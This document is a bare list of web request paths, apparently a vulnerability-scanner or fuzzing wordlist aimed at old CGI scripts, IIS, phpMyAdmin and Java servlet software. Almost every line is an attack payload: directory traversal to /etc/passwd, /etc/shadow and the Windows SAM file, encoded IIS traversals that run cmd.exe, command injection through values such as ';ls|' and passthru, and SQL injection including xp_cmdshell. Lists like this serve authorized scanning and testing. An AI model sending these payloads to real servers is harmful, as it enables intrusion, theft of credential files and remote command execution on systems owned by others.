/cgi-bin/db2www.exe/../../db2www.ini
/cgi-bin/db2www/../../db2www.ini
/cgi-bin/dcboard.cgi
/cgi-bin/dcforum.cgi?az=list&file=filename%00
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/debug.cgi
/cgi-bin/debug.pl
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/cgi-bin/download.pl?s=path&c=txt&f=fn
/cgi-bin/empower?DB=mungowitsch
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/finger.cgi
/cgi-bin/forma
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/FormMail.cgi
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/cgi-bin/formvar.exe
/cgi-bin/forums/dcboard.cgi
/cgi-bin/futureforum3.cgi
/cgi-bin/getcomments.pl
/cgi-bin/gettext.pl
/cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/hwtestio
/cgi-bin/ibillpm.pl
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
/cgi-bin/lastlines.cgi
/cgi-bin/lb5000/search.cgi
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi-bin/mail.cgi
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailme.exe
/cgi-bin/mailmepro.exe
/cgi-bin/mailnews.cgi
/cgi-bin/MailPost.exe
/cgi-bin/mailsend.exe
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/nph-maillist.pl
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/cgi-bin/paramtool
/cgi-bin/passcfg
/cgi-bin/PGPMail.pl
/cgi-bin/pi?page=document/show_file&id=
/cgi-bin/ping.cgi
/cgi-bin/postie.cgi
/cgi-bin/postie.exe
/cgi-bin/post-query?
/cgi-bin/powerup/r.cgi?FILE=main.html
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/processit.pl
"/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1"
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
"/cgi-bin/sendpage.pl?message=test"";/bin/ls;echo%20""message"
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/cgi-bin/shopper.exe?key=&20&preadd=action&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=%20&template=order.log
/cgi-bin/stats.pl
/cgi-bin/statsconfig.pl
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/story.cgi?next=
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/test.txt;%20/bin/ls
/cgi-bin/traceroute.cgi
/cgi-bin/uncgi
/cgi-bin/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/w3mail/login.cgi
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/cgi-bin/webdriver
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
/cgi-bin/ws_mail.cgi?kill=ng
/cgi-bin/wsendmail.exe
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/cgi-home/
/cgi-local/
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-sys/PGPMail.pl
/cgiWebupdate.exe
/cgi-win/
/chip.ini
/ChipCfg
/ChipCfg.cfg
/class/mysql.class
/components/AspUpload/Samples/DirectoryListing.asp
/components/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/UploadScript11.asp
/compose.php
/config.inc
/config/
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000
/db.inc
/db2_doc/html/db2srsen.exe
/dbconfig.inc
/decsadm.nsf
/default.asp%3f.htr
/default.php%20%20
/default.php3%20%20
/deletecontact.php?item_id=100+OR+TRUE+;
/discuss/passwd.txt
"/domcfg.nsf/viewname%3fSearchView&Query=""*"""
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/events4.nsf
/examples/servlet/SnoopServlet
/ext.dll
/ext.dll%00
/foldoc/template.cgi?template.cgi
/global.asa%20.pl
/global.asa%3f.htr
/global.asa%3f.jsp
/global.asa::$DATA
/global.asax
/global.asax.cs
/global.cnf
/globals.pl
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/hypermail
/ifx/?LO=../../../../../../../../../etc/hosts
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/iisadmpwd/_AuthChangeUrl
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/images/tmp.txt
/imp/compose.php
/inc/db.inc
/inc/odbc.inc
/inc/sendmail.inc
/inc/sql.inc
/inc/test.php
/include/config.inc
/include/sql.inc
/include/sql.php
/include/test.php
/includes/
/index.js%2570
/index.jsp::$DATA
/index.php%20%20
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
/index.php3%20%20
/index.search
/info/
/internal/
/interscan/cgi-bin/FtpSave.dll?I'm%20here
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?yes
/isapi/tstisapi.dll
/java/
/join.cfm
/jsp_test/PoolMan.jsp
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/logs/webstar.log
/mailman/edithtml
/manual.php
/merchants/admin.pw
"/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20""Content-Type:%20text%2Fhtml""%3Becho%20""""%20%3B%20id%00"
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/mysql.class
/network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
/odbc.inc
/opendir.php?requesturl=/etc/hosts
/pals-cgi?palsAction=restart&documentName=pals-cgi
/pass?loginpass=a&redirect=0%2F&Submit=Login
/passcfg
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/phpBB/bb_memberlist.php?sortby=user_regdate
"/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'hoschi'%23"
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
"/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK="".passthru('/bin/ls')."""
"/phpMyAdmin/tbl_copy.php?strCopyTableOK="".passthru('/bin/ls')."""
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phprocketaddin/?page=../../../../../../../etc/hosts
/pi_admin.admin
/ping
/pls/admin_/?
/PoolMan.jsp
/priv/
/private/
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
/remote_login.pl%20
/ROADS/cgi-bin/search.pl?form=search.pl%00
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/run.cgi
/run/forma
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doctype=raw&Collection=
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/sbin/
/sbin/nscgi.cfg
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/scripts/*.pl
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:/scripts/blat.exe
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/scripts/formvar.exe
/scripts/mail.cgi
/scripts/mailform.exe
/scripts/mailme.exe
/scripts/mailmepro.exe
/scripts/MailPost.exe
/scripts/mailsend.exe
/scripts/postie.cgi
/scripts/postie.exe
/scripts/rguest.exe
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell(""cmd.exe+/c%20dir"");--"
/scripts/toos/mkilog.exe
/scripts/wsendmail.exe
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/search/s97_cgi.exe
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/servlet//..//../o.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/com.unify.ewave.servletexec.UploadServlet
/servlet/FormMailServlet?juhu.txt
/servlet/jsp/../../tst.txt
/servlet/psoft.hsphere.CP
/servlet/ServletManager?username=servlet&password=manager
/servlet/ssifilter/../../test.jsp
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/servlet/WebPopServlet?config=uii.txt
/session/pagecount?page=
/shtml/
/stat/
/stats/
/store/customers/
/store/temp_customers/
/stronghold-info
/stronghold-status
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/Test11.asp
/tst/psoft.hsphere.CP/tst/?template_name=x
/upload.html
/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/way-board/way-board.cgi?db=url_to_any_file%00
/way-board/way-board.cgi?db=way-board.cgi%00
/web.config
/Web_store/web_store.cgi?page=../../../../../../../../etc/passw
/webadmin.nsf
/webadmin.ntf
/WebDB/admin_/
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/webmacro/Page?db=tst&wmtemplate=ttt
/webres/discuss/passwd.txt
/WebSTAR%20LOG
/webstar.log
/wwwboard/passwd.txt
/xsql/java/demo/
:10000/net/
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
:12000
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:2301/Proxy/LoginResponse
:30001/../../template/shared/indexTemplate.xml
:30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
:4096/../../../winnt/repair/sam._
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
:631/admin/?op=%c0
:6346/........../windows/win.ini
:8000/./WEB-INF/
:8000/./WEB-INF/web.xml
:8000/file/%2E%2E/test1.mp3
:8080/%252e%252e/%252e%252e/%00.jsp
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/../examples//WEB-INF/../../../../../
:8080/../ssd.ini
:8080/.jsp/WEB-INF/classes/Env.java
:8080/\../readme.txt
:8080/examples/servlet/SnoopServlet
:8080/index.js%2570
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3"
:9090//etc/shadow

/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini
/a.asp/..%c0%2f../..%c0%2f..\winnt\repair\sam._
/a.asp/..%c0%af../..%c0%af../winnt/win.ini
/a.asp/..%c0%af../..%c0%af..\winnt\repair\sam._
/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
/a.asp/..%c1%1c../..%c1%1c..\winnt\repair\sam._
/a.asp/..%c1%9c../..%c1%9c../winnt/win.ini
/a.asp/..%c1%9c../..%c1%9c..\winnt\repair\sam._
/adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/PBServer/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/Rpc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

